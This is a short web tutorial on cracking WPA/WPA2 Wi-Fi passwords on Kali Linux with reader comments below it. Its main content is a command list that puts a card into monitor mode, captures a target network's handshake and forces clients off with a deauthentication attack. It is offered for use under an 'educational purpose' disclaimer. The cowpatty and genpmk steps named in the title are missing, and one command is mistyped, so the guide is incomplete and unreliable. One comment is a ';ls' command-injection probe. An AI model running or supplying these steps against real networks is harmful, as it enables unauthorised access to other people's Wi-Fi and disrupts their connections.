Crack WPA & WPA2 with Cowpatty and Negpmk on Kali Linux

In this tutorial we are going to teach you How to crack WPA & WPA 2 with cowpatty and negpmk on Kali Linux. We high recommend this for research or educational purpose only.

Also Read: Crack WPA & WPA2 with Aircrack-ng on Kali Linux

This tutorial is only for educational purpose. Use this tool at your own risks, we are not responsible for any damage that cause you.

Things we used for cracking WPA & WPA2:

Command to crack WPA & WPA2:

airmon-ng 
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0 
airodump-ng -c [channel id] --write latesthackingnews --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0

sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up 

Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux:

Related posts

The Advantages of Runtime Application Self-Protection

Top Data Strategies to Better Protect Your Information from Hackers

Ransomware Recovery: Steps to Take After an Attack

4 comments

Anonymous March 24, 2016 - 6:48 am
Why use sudo if you're already root?
anonymous March 21, 2016 - 9:15 am
where i can find that "darcOde.ls" ???????
fu-ck the sys-teme March 20, 2016 - 7:10 pm
Evil Twin --->Best
Anonymous January 29, 2016 - 1:49 pm
;ls

Comments are closed.

Add Comment